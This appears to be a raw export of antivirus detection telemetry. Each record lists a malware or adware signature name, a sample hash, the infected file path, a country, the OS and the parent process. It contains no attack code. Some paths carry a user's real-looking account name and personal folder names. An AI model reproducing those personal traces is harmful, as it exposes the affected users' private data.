  Row(detection=Row(filename='af72b66b2f660b297ba6c87cb99002509dfbd19e8bf9a9b09b9005e89c1b3a41', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\AF72B66B2F660B297BA6C87CB99002509DFBD19E8BF9A9B09B9005E89C1B3A41', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='af72b66b2f660b297ba6c87cb99002509dfbd19e8bf9a9b09b9005e89c1b3a41', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:51:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297515', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297515', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:45:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185308-f5915de0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b4cbd8e\\AVSCAN-20181104-185214-EDAFD691\\AVSCAN-20181104-185308-F5915DE0', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ba73e11188a5bbe09ed202cdaddaecd29001007fc81326b63e4837a9881a12ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:53:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023deca', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023deca', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:54:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152500-c8bdb048', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_436779a9\\AVSCAN-20181104-151638-82CFE55F\\AVSCAN-20181104-152500-C8BDB048', filesize=1088000, name='Adware/Wajam.aib.#M1.#R1'), hash='ad834f39ca2de4a1dbf53ec217e7479e1b689ffbd2ac2f209257b7a437b4d971', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:25:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135538-a3533bc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135538-A3533BC1', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl145.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl145.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lio first outline.doc', filepath='LIO First Outline.doc', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:30:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:55:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nszF454.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Desktop\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T01:16:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093658-5c1a1038', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3200c92c\\AVSCAN-20181104-093617-5476D32E\\AVSCAN-20181104-093658-5C1A1038', filesize=640000, name='TR/BHO.Gen.#M1.#R1'), hash='ee8dd5bfe25e4e3eb0158f6f3c8d2012618e9b95de851d2b671ad19bb80bb857', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:36:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:02:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001426-78275284', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_712814e7\\AVSCAN-20181105-001051-4EFB6BCC\\AVSCAN-20181105-001426-78275284', filesize=2496000, name='HEUR/AGEN.1024324.#M1.#R1'), hash='ffee224f9f3581b42774a9280783e15853f4375110eb991c9d5f3c976456bac1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:14:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T07:04:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='semstat.exe', filepath='G:\\دورة صيانة 2017\\imie tool\\IMEI CHANGER\\IMEI Write allwinner A10,A13\\AutoPlay\\Docs\\Dragonface-V10\\CPFOP\\bin\\semstat.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='f3e9e23e2dc5db15bd28a107a1a7ae7276e7fbb796641d372c7bdd89d2464a02', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\mshta.exe', parentsize=13312, timestamp='2018-11-01T13:05:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmmb25fimks.exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmmB25FIMKS.exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-011437-63ff0f35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8076cd85\\AVSCAN-20181031-190013-AB75577F\\AVSCAN-20181101-011437-63FF0F35', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:14:42Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-17-42-00.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T20:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T01:09:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07ca3b6da26ae9c96203cb4d52526cf7b817d596125567563074126417ef6f5b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-3\\07CA3B6DA26AE9C96203CB4D52526CF7B817D596125567563074126417EF6F5B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='07ca3b6da26ae9c96203cb4d52526cf7b817d596125567563074126417ef6f5b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:10:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='357.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\357\\357.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T22:45:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe755_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe755 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:34:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:33:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rtcru32.exe', filepath='\\\\?\\D:\\1 My Master 183\\Driverpack\\drivers\\DP_CardReader_17071\\Realtek\\FORCED\\NTx86\\5227_10.0.15063.21302\\RtCRU32.exe', filesize=3648000, name='W32/Sality.AT.#M1.#R1'), hash='6a7bc00145c3d6cf6e57764d07bac4309627705cd7139ccd3080e06cd251a623', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221529-5f172c0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221529-5F172C0C', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:57:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nghị định 99.exe', filepath='G:\\\xa0\\NGHỊ ĐỊNH 99.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='05c4a91b676a6f1c6c9d0a9603d1b9a9fa64f8f44098188f92af40e1d9ac751a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\CocCoc\\Browser\\Application\\browser.exe', parentsize=1518968, timestamp='2018-11-02T08:31:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160003-ed9f9aaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160003-ED9F9AAF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0155039.dll', filepath='g:\\system volume information\\_restore{98857453-17a4-42b1-8085-e71e507860ed}\\rp81\\A0155039.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='553373c83885d2881f84dda86811e62ccb2c666cdfd37135b8d126f778a1a711', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:52:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155036-282db206', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_783866bc\\AVSCAN-20181102-154148-C5AE8805\\AVSCAN-20181102-155036-282DB206', filesize=192000, name='BDS/Androm.EB.73.#M1.#R1'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:20:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='images.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku\\images\\images.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1adcd3c0c786fe2b4b7003ca5137bb46d6fe4391b9ad74a201985173a2517507', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194001-f38222fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-192351-465271A7\\AVSCAN-20181102-194001-F38222FA', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:40:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161740-6018528b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-161538-52C9C851\\AVSCAN-20181102-161740-6018528B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:17:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vision preview pack 1.bat', filepath='C:\\Users\\X\\Pictures\\NVIDIA Corporation\\3D Vision Experience\\3D Vision preview pack 1\\Vision preview pack 1.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T03:36:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.800\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.800\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:00:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\19DB880A0AC3F7A8DC75D7CDB88A02B5CA846E896BC92A1A68B5C1B72EE68205', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:49Z'), dt=datetime.date(2018, 11, 2)),
